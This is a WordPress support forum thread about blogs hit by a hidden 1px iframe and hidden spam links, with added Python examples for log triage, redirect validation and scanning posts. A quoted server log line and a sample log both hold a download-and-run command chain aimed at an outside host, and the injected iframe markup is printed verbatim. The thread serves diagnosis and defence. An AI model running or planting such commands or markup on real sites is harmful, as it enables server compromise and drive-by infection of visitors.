
iframe injection problem?

    Hi,

    I’ve searched around for a resolution to my problem but the closest thread I can find is this: http://wordpress.org/support/topic/89912?replies=4

    Basically about a week ago my site began experiencing problems whenever I tried to access the home page http://www.heroes-hype.com. The screen just freezes for about 10 minutes..sometimes it also throws me out (closes the browser). In the browser footer it displays the following:

    waiting for http://xx.xx.xx.xx/iframe/wp-stats.php

    (the ‘x’ is an IP address which I don’t recognise)

    At first I suspected that it was a problem with the wp-stats plugin which I had just installed prior to this problem surfacing. So I removed the plugin (and other plugins)..I also tried other themes and browsers, but a wee later and the problem still remains.

    So I contacted my host (as one of the threads here suggested I do) and they have reported to me the following:

    “Your site was most likely injected with a 1px iframe due to a vulnerability in WordPress — which is why 2.2.3 was rushed out and pushed out to everyone. A number of sites have the same link which leads one to believe it was due to an exploit in either WordPress itself or the theme you’re using (which has also been called into question as of late).”

    So now I’m wondering whether anyone can corroborate that this is the likely reason..and whether there is anything I can do to resolve the problem. I would of course like to upgrade to 2.3 asap, but I doubt this will solve the issue in itself..or will it?

    Any advice would be much appreciated.

    PS I am using the CSS Freak theme.

Viewing 15 replies - 16 through 30 (of 89 total)
  • Didn’t mean to imply that I was going to delay an update. 🙂 I did update to 1.3.1 but from other comments it seems to have the same problem.

    I’ve just done a little digging in my logs but haven’t spotted anything yet. I’ll keep looking.

    fermuned

    @fermuned

    I suffer the same iframe injection using WP 2.2.2

    The iframe code was inserted inside the last post (I think that could be important) and, looking at the server logs, nobody accessed the admin part of WP nor the single page of the affected post.

    The strangest lines in the server logs are:
    1.-GET //wp-pass.php?_wp_http_referer=http://201.37.71.117:8090/tool25.txt?&cmd=cd%20/tmp;rm%20x.txt;wget%20http://201.37.71.117:8090/x.txt;fetch%20http://201.37.71.117:8090/x.txt;lwp-download%20http://201.37.71.1175:8090/x.txt;curl%20-O%20http://201.37.71.117:8090/x.txt;lynx%20http://201.37.71.117:8090/x.txt;perl%20x.txt HTTP/1.1" 302 - "-" "Mozilla/3.0 (compatible; Indy Library)"
    2.-"OPTIONS / HTTP/1.1" 200 27903 "-" "Microsoft Data Access Internet Publishing Provider Cache Manager"
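    The two log lines above are the kind of thing worth searching for across a whole access log rather than by eye. The following is an added example (Python, written for this edit; it is not code from the thread or from WordPress) that parses Apache combined-format lines and flags three things: a `_wp_http_referer` whose host is not the blog's own (the open-redirect abuse), a `cmd=` parameter carrying a download-and-execute chain like the one quoted, and bare OPTIONS probes. The log format, the `OWN_HOSTS` set and the sample lines (modelled on the two above, with RFC 5737 documentation addresses standing in for the real IP) are assumptions constructed for the demo.

```python
"""Triage Apache access-log lines for the wp-pass.php open-redirect /
download-and-execute probe quoted in this thread.

Added example (Python, not WordPress code). Assumptions: Apache "combined"
log format, and OWN_HOSTS lists the hostnames this blog legitimately uses.
Sample lines are constructed for the demo and use RFC 5737 documentation
addresses in place of the real attacker IP.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

OWN_HOSTS = {"www.example.com", "example.com"}  # assumption: your blog's hosts

# Apache combined log format (assumed; adjust if your vhost logs differently).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Download-then-run chains typical of mass web-shell droppers: any fetch tool
# followed later in the same command string by an interpreter.
DROPPER_RE = re.compile(
    r"\b(?:wget|curl|fetch|lwp-download|lynx)\b.*\b(?:perl|php|sh)\b",
    re.IGNORECASE,
)


def parse_line(line):
    """Return the log fields as a dict, or None if the line does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def triage(line):
    """Return a finding dict for a suspicious request, or None for a clean one."""
    rec = parse_line(line)
    if rec is None:
        return None
    # Split path and query by hand: urlsplit() would read the leading "//" in
    # "//wp-pass.php" as an authority and lose the path.
    path, _, query = rec["target"].partition("?")
    findings = []

    # 1. _wp_http_referer pointing off-site: the open-redirect abuse in the thread.
    for value in parse_qs(query, keep_blank_values=True).get("_wp_http_referer", []):
        host = urlsplit(unquote(value)).hostname
        if host and host.lower() not in OWN_HOSTS:
            findings.append(f"open-redirect probe via _wp_http_referer -> {host}")

    # 2. A cmd= parameter carrying a download-and-execute chain.
    decoded = unquote(query)
    if "cmd=" in decoded and DROPPER_RE.search(decoded):
        findings.append("command-injection payload (download-and-run chain) in query")

    # 3. OPTIONS against the root: method/WebDAV enumeration, low severity on its own.
    if rec["method"] == "OPTIONS":
        findings.append("OPTIONS probe (method/WebDAV enumeration)")

    if not findings:
        return None
    return {"ip": rec["ip"], "path": path, "status": rec["status"],
            "ua": rec["ua"], "findings": findings}


def triage_log(lines):
    """Run triage() over many lines, keeping only the hits."""
    return [hit for hit in (triage(line) for line in lines) if hit is not None]


# Constructed sample, modelled on the two lines quoted in the thread plus two
# benign requests (a normal page view and a same-site _wp_http_referer).
SAMPLE_LOG = [
    '203.0.113.9 - - [06/Dec/2007:03:14:22 +0000] "GET //wp-pass.php?_wp_http_referer='
    'http://203.0.113.9:8090/tool25.txt?&cmd=cd%20/tmp;rm%20x.txt;wget%20http://203.0.113.9:8090/x.txt;'
    'perl%20x.txt HTTP/1.1" 302 - "-" "Mozilla/3.0 (compatible; Indy Library)"',
    '198.51.100.7 - - [06/Dec/2007:03:15:01 +0000] "OPTIONS / HTTP/1.1" 200 27903 "-" '
    '"Microsoft Data Access Internet Publishing Provider Cache Manager"',
    '198.51.100.8 - - [06/Dec/2007:03:16:40 +0000] "GET /2007/12/06/some-post/ HTTP/1.1" 200 18233 '
    '"http://www.example.com/" "Mozilla/5.0"',
    '198.51.100.9 - - [06/Dec/2007:03:17:02 +0000] "GET /wp-pass.php?_wp_http_referer='
    'http://www.example.com/2007/12/06/some-post/ HTTP/1.1" 302 - "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in triage_log(SAMPLE_LOG):
        print(hit["ip"], hit["path"], hit["status"], "; ".join(hit["findings"]))
```

    Note that the redirect itself answered 302, so the blog did exactly what the attacker asked; the real damage depends on what the target of the redirect (or whatever consumed `cmd=`) did next, which is why the same IP should then be looked up across every other vhost log on the box.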

    aNieto2k

    @anieto2k

    I tried to use this code to inject something into posts, but I can’t.

    I found a bad behaviour in the redirect: it’s possible to redirect to another website?

    http://youtblog.com?_wp_http_referer=http://www.google.com

    Why??

    I modified wp_sanitize_redirect() to make the redirection more restrictive.

    function wp_sanitize_redirect($location) {
        $location = preg_replace('|[^a-z0-9-~+_.?#=&;,/:%]|i', '', $location);
        $location = wp_kses_no_null($location);
        /* Only redirections into the blog: an absolute URL must begin with the
           blog's home URL. (Prefix comparison instead of eregi(), which used the
           home URL as a regular expression and matched it anywhere in the string,
           so http://evil/?x=http://blog would have passed.) */
        $home = get_option("home");
        if (stristr($location, "http://") && strncasecmp($location, $home, strlen($home)) != 0) return $home;
        // remove %0d and %0a from location
        $strip = array('%0d', '%0a');
        $found = true;
        while($found) {
            $found = false;
            foreach($strip as $val) {
                while(strpos($location, $val) !== false) {
                    $found = true;
                    $location = str_replace($val, '', $location);
                }
            }
        }
        return $location;
    }

    Sorry for my English.
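    The open redirect shown above (`?_wp_http_referer=http://www.google.com`) is the primitive the log line in the earlier reply abuses. As an added example that is neither the poster's patch nor WordPress code, the check is restated below in Python with the "stay on this blog" decision made on the parsed host of the target rather than on a substring or regex match: a substring test lets `http://evil/?next=http://www.example.com` through, a plain `http://` test misses protocol-relative `//evil/`, and a prefix test still accepts `http://www.example.com.evil/`. The character whitelist and the `%0d`/`%0a` stripping loop are carried over from the patch above; `HOME` stands in for `get_option('home')` and is an assumption.

```python
"""Redirect-target validation that only allows redirects back into the blog.

Added example (Python, not the WordPress function itself). It keeps the
character whitelist and the %0d/%0a stripping loop from the patch above, but
replaces the eregi() substring test with a parsed-host comparison. HOME stands
in for get_option('home') and is an assumption.
"""
import re
from urllib.parse import urlsplit

HOME = "http://www.example.com"  # assumption: the value of get_option('home')

# Same whitelist as the PHP patch; it also drops NUL, '@', '\' and whitespace.
_ALLOWED_CHARS = re.compile(r"[^a-z0-9\-~+_.?#=&;,/:%]", re.IGNORECASE)
_CRLF = re.compile(r"%0[da]", re.IGNORECASE)


def sanitize_redirect(location):
    """Whitelist characters, then strip encoded CR/LF until none remain
    (a single pass would turn "%0%0dd" into "%0d", hence the loop)."""
    location = _ALLOWED_CHARS.sub("", location)
    while _CRLF.search(location):
        location = _CRLF.sub("", location)
    return location


def validate_redirect(location, home=HOME):
    """Return `location` if it stays on the blog's own host, else `home`."""
    loc = sanitize_redirect(location)
    # A path-relative target ("/wp-admin/") cannot leave the site; a
    # protocol-relative one ("//evil/") can, so it falls through to parsing.
    if loc.startswith("/") and not loc.startswith("//"):
        return loc
    parts = urlsplit(loc)
    if parts.scheme not in ("http", "https"):
        return home  # javascript:, data:, or no scheme at all
    home_host = urlsplit(home).hostname
    if parts.hostname is None or parts.hostname.lower() != home_host:
        return home  # different host, including lookalike subdomains
    return loc


if __name__ == "__main__":
    for target in ("/wp-admin/", "http://www.google.com",
                   "http://evil.example.net/?next=http://www.example.com/",
                   "//evil.example.net/", "http://www.example.com.evil.example.net/"):
        print(f"{target!r:60} -> {validate_redirect(target)!r}")
```

    Comparing the parsed hostname is the same approach later WordPress releases took in `wp_safe_redirect()` / `wp_validate_redirect()`, which check the target's host against the blog's own (plus a filterable allow-list) before issuing the Location header.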

    pishmishy

    @pishmishy

    If you’ve been affected by this issue it would be very helpful if you can search through any MySQL logs you have to see if we can pin down where the code was inserted into the database.

    See http://trac.wordpress.org/ticket/5313

    Same problem! Major security issue!

    Mdkart, do you have any logs that may be useful to us?

    I think my site got one also, if you see some funky stuff

    voiceofbragg, do you have logs from MySQL that may help us here?

    Nope, he’s just spamming the forum… [links from his post were deleted]

    > pishmishy
    No MySQL logs, I can’t access them on my server 🙁

    I just found some code injected in a post from dec. 6th
    http://sintonizando.com/2007/12/06/ulrich-schnauss-elika-y-project-skyward-en-vivo-en-lima/

    some spam links hidden by this:

    <font style="position: absolute;overflow: hidden;height: 0;width: 0">

    I’m on WP 2.2
    Any ideas what to fix, or what to update?

    theapparatus

    @theapparatus

    Any ideas what to fix, or what to update?

    I’d just update the install as you’re a few versions behind. It’s up to 2.3.1 now.

    I just found a post with this code injected with WP 2.2.3. I’m upgrading to 2.3.1 now and have contacted my ISP to see if MySQL logs are available. (Edit: no, logs aren’t available; darned shared hosting.)

    Plugins:
    Edit Comments 0.3 beta
    Filosofo Comments Preview 0.7
    Spam Karma 2 2.2 r3

    Theme:
    extensively hacked version of kubrick

    Damn, I am having same problem. Just realized this in my source code:

    <!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->

    Any solution yet!?
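    Once the injected markup is known (the 1x1 iframe above, and the zero-size overflow-hidden `<font>` wrapper around spam links quoted a few replies earlier), every stored post body can be scanned for it instead of reading page source by hand. The following is an added example (Python, not code from the thread or from WordPress) that walks post HTML with the standard-library parser and reports tiny or off-site iframes and elements whose inline style makes them invisible. The sample post bodies are constructed for the demo, modelled on the two snippets in this thread; `ALLOWED_EMBED_HOSTS` is an assumption and should list the hosts you genuinely embed from. In practice the input is the `post_content` column of `wp_posts`.

```python
"""Scan stored post HTML for the two injection patterns quoted in this thread:
a 1x1 iframe to an off-site host and a zero-size, overflow-hidden container
wrapping spam links.

Added example (Python, not part of WordPress). The post bodies below are
constructed for the demo; in practice feed it the post_content column of
wp_posts. ALLOWED_EMBED_HOSTS is an assumption: list the hosts you really
embed iframes from.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

ALLOWED_EMBED_HOSTS = {"www.youtube.com"}  # assumption: your legitimate embed hosts

# Inline styles that make an element invisible: display/visibility, or a box
# collapsed to zero in both dimensions (the thread's <font> example). Applied
# to the style string after lowercasing and removing spaces.
_HIDDEN_STYLE = re.compile(
    r"display:none|visibility:hidden"
    r"|height:0(?:px)?(?:;|$).*width:0(?:px)?(?:;|$)"
    r"|width:0(?:px)?(?:;|$).*height:0(?:px)?(?:;|$)"
)


def _px(value):
    """Parse a width/height attribute like "1" or "1px"; None if not a pixel size."""
    if value is None:
        return None
    m = re.fullmatch(r"\s*(\d+)\s*(?:px)?\s*", value)
    return int(m.group(1)) if m else None


class InjectionScanner(HTMLParser):
    """Collects (kind, detail) findings for suspicious start tags."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {name: (value or "") for name, value in attrs}
        if tag == "iframe":
            width, height = _px(a.get("width")), _px(a.get("height"))
            if any(v is not None and v <= 1 for v in (width, height)):
                self.findings.append(("tiny-iframe", a.get("src", "")))
            host = urlsplit(a.get("src", "")).hostname
            if host and host.lower() not in ALLOWED_EMBED_HOSTS:
                self.findings.append(("external-iframe", host))
        style = a.get("style", "").lower().replace(" ", "")
        if style and _HIDDEN_STYLE.search(style):
            self.findings.append(("hidden-container", f'<{tag} style="{style}">'))


def scan_posts(posts):
    """posts: iterable of (post_id, html). Returns [(post_id, kind, detail), ...]."""
    hits = []
    for post_id, html in posts:
        scanner = InjectionScanner()
        scanner.feed(html)
        scanner.close()
        hits.extend((post_id, kind, detail) for kind, detail in scanner.findings)
    return hits


SAMPLE_POSTS = [
    # The 1px "Traffic Statistics" iframe from the thread, appended to a post.
    (101, '<p>Concert review.</p>\n<!-- Traffic Statistics --> '
          '<iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0>'
          '</iframe> <!-- End Traffic Statistics -->'),
    # The zero-size <font> wrapper around spam links from the thread.
    (102, '<p>Setlist below.</p><font style="position: absolute;overflow: hidden;height: 0;width: 0">'
          '<a href="http://pills.example.net/">buy</a></font>'),
    # A clean post with an ordinary video embed.
    (103, '<p>Clean post.</p><iframe src="http://www.youtube.com/embed/abc123" width="425" height="344"></iframe>'),
]

if __name__ == "__main__":
    for post_id, kind, detail in scan_posts(SAMPLE_POSTS):
        print(post_id, kind, detail)
```

    A hit gives you the post ID, which is what the earlier request for MySQL logs was after: the post's `post_modified` timestamp narrows the window in which the access log has to be searched, even on shared hosting where the database log itself is out of reach.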

    Not found the source yet, or confirmed that it’s a current problem so there’s no fix.
    What release of WordPress are you running?
    Are you able to determine when that code was inserted? It may have been in your code for a while and so may have been inserted whilst you were running an old copy of WordPress.
